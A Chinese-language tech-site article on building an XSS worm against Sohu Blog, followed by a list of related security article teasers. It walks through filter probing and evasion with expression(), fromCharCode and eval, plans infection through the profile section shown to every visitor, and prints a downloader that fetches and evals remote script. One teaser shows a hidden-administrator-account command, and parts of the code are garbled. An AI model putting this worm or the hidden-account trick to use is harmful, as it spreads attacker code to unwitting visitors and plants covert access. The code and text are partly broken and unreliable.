XSS wrom网站如何实现入侵?以搜狐博客为例
XSS wrom网站如何实现入侵?不说废话,且看怎么实现,我先拿SOHU BLOG做示范。
1. 测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,\/前是真正的空格),在个人档案处看过滤了哪些。
’’;:!--"={()} \/
结果
’’;:!--"={()} // (&后是amp,论坛过滤了)
过滤了"javascript","&"和"\"这两个转义字符串,因此HTML转码和CSS样式转码已无效,只好从属性和事件入手。
2. 测试一个XSS常用属性和两个事件,貌似没有过滤字符。expressiononerroronload
3. 下面开始尝试构造语句。如下: 构造完整标记,页面输出后又全部过滤。
4. "/"字符没有过滤因此可以构造注释符,expression属性可以配合注释符构造出语句:
5. 由于expression属性比较特殊想当于一个死循环的EVAL函数,同时style标记里不能出现";"字符,也就是不能构造多条连接在一起的javascript,因此构造出如下语句://设置一个COOKIE在10秒后失效,并在这条COOKIE语句中执行其他语句或函数。
6. 遗憾的是SOHU BLOG对于标记内不合适的内容都会过滤,因此我们无法eval标记内的某个变量,于是采用fromCharCode方法,将Unicode字符值专成字符串再用eval函数执行:
7. 感染流程考虑:
㈠ BLOG页面的个人档案处是页面通用的
㈡ XSS内容写到个人档案处,所有浏览者都会触发XSS
㈢ 实现一段提交XSS内容到个人档案的代码.
8. 个人档案处只能输入2048个字符,又采用了fromCharCode方法,因此出现XSS代码长度的限制,因此只能调用远程代码,于是写出了个XSS downloader。
主要代码:
function d(){a=new ActiveXObject(’Microsoft.XMLHTTP’); /*调用XMLHTTP控件a.Open(’get’,http://s0n9.blog.sohu.com/31406970.html’,false);/*发出一个GET提交请求a.send();b=a.responseText; /*将传回值赋给变量Beval(unescape(b.substring(b.indexOf(’--|’) 3,b.indexOf(’|--’))));/*用indexOf计算 --|********|-- 的位置,用substring方法取出字符串,最后用unescape方法解码.}d()
http://s0n9.blog.sohu.com/31406970.html 页面代码:
alert('xss');/*利用escape将标点符号转码,由于responseText特性,某些字符会转换,如"&"字符会变成"&"(&后是amp,论坛过滤了)
其他传染和详细的伪造提交的过程略去,各门户网站小心,过滤好XSS关键字,以防止XSS WROM爆发 。
wapiti是什么?轻量级wapiti能检测出哪些漏洞?
Wapiti是Web应用程序漏洞错误检查工具。它具有“暗箱操作”扫描,即它不关心Web应用程序的源代码,但它会扫描网页的部署,寻找使其能够注入数据的脚本和格式。它用于检测网页,看脚本是否脆弱的。Wapiti是一个开
详情2018-01-23 09:55:08责编:llp 来源:驱动管家什么是跨站入侵攻击?怎么寻找跳板入侵网站?
很多时候在企业网络安全,特别是服务器上数据库安全防范方面需要特别注意,弥补所有漏洞,减少因设置不当带来的入侵事件的发生。然而在实际使用与维护过程中我们经常会听到一个新的名词——“跨站入侵”,那么什
详情2018-02-17 13:03:54责编:llp 来源:驱动管家pjblog3 v3存在设计错误漏洞 测试pjblog3 v3漏洞的方法
发布日期:2011-06 19发布作者:佚名影响版本:PJBlog3 V3 2 8 352漏洞类型:设计错误漏洞描述:PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前
详情2018-03-01 19:06:20责编:llp 来源:驱动管家天网防火墙如何安装?天网防火墙怎么禁止本地用户使用ping命令?
任务一 正确安装天网防火墙任务二 利用防火墙进行以下实验1、禁止局域网用户使用PING命令对本机进行嗅探2、禁止本地QQ登录及应用3、禁止本地用户使用PING命令通过以上内容的学习,实际操作天网防火墙的设置,并
详情2018-01-22 10:55:31责编:llp 来源:驱动管家如何设定一个无ip的log服务器?为什么要stealth呢?
在网上越来越多的hacker 的出现, 越来越多的高手出现的情况下 如何才能确保自己可以保存一份完整的log 呢?稍微有点概念的hacker 都知道,进入系统后的第一见事情就是去清理log, 而发现入侵的最简单最直接的
详情2018-02-02 17:53:27责编:llp 来源:驱动管家你知道如何克隆管理员账号吗?克隆账号怎么做?
现在入侵一台主机容易但是保护好很难 所一我们讲一下手动克隆管理员帐号!~c: >net user hacker$Content$nbsp;123456 add 后面加$Content$nbsp;是为了使在 控制台下用 net user 看不到 然后运行reged
详情2018-03-03 12:09:34责编:llp 来源:驱动管家怎么利用搜狐网站的url跳转漏洞盗取密码?
url跳转漏洞遍布各大网站,简单看一下,THE9、sohu等居然都存在这个漏洞!我们就拿sohu为例,讲一下该漏洞。来到sohu的用户注册页面,可以看到,在IE地址栏里,默认写着http: passport sohu com web signup jsp?
详情2018-03-08 12:03:38责编:llp 来源:驱动管家瑞星杀毒软件怎么用?使用瑞星杀毒软件网络版的注意事项
瑞星杀毒软件网络版可以对网络内的计算机进行统一的安装、设置、管理、维护和升级,从而为企业网络提供完善的病毒防范体系。对于初次接触瑞星杀毒软件网络版的用户来讲,使用经验的缺乏和对产品功能的不熟悉都可
详情2018-01-15 14:04:48责编:llp 来源:驱动管家一些查询Linux系统的一句话脚本 如何查看谁破解你的ssh?
1、查看谁破解你的sshcat var log auth log | grep "pam_unix(sshd:auth): authentication failure; " | cut -f14 -d | cut -d& 39;=& 39; -f2 | sort | uniq -c | sort -nr2、查看当前网
详情2018-03-01 12:15:36责编:llp 来源:驱动管家怎么让u盘代替windows系统的密码?
【赛迪网-IT技术报道】U盘 如今可以说非常普及了,不过,如果只是把它用来存储数据的话,也许有点可惜了。其实,我们还可以让U盘发挥更大的能量!今天小编教你一招,能让你的U盘代 替登录系统的密码,只有当你插上U盘才能正常进入系统操作,否则任何操作都无法进入系统。
详情2018-01-17 20:08:26责编:llp 来源:驱动管家
- 安装mcafee企业版的步骤 mcafee如何用?
- win8/8.1安装驱动时提示“数据无效”的解决方法
- 转换图片格式的方法有哪些?图片格式转换器的介绍
- 怎么用ppt制作出现代圆形的印章?
- 300元内机箱哪家强!六款暑期超值机箱推荐
- INTEL CPU怎么选 Intel CPU中高端处理器推荐
- 博通收购高通交易可能对美国国家安全带来威胁
- 又一大波动:饿了么将被阿里全资收购?
- 怎么通过任务管理器快速关闭相同的后台进程
- 使用u盘插入电脑的时候没有反应是怎么回事?怎么解决
- 呼叫转移怎么设置?以三星a5手机为例
- 纽曼纽扣手机装sim卡很简单!这里有装卡教程
- 硬盘整数分区怎么计算?硬盘整数分区的最精确方法
- 如何避免在淘宝买到假货 淘宝避免买到假货三个方法
- 黑客如何窃取Target供应商的信用凭证?有十一个步骤
- Gh0st逻辑漏洞导致向控制端发送任意文件
- 如何在win8PE下对系统进行备份?
- 百词斩离线包怎么用?百词斩离线包使用方法介绍
- 怎么将txt格式文件直接转换成图片的格式
- AMD FX-8370怎么样?FX-8370详细评测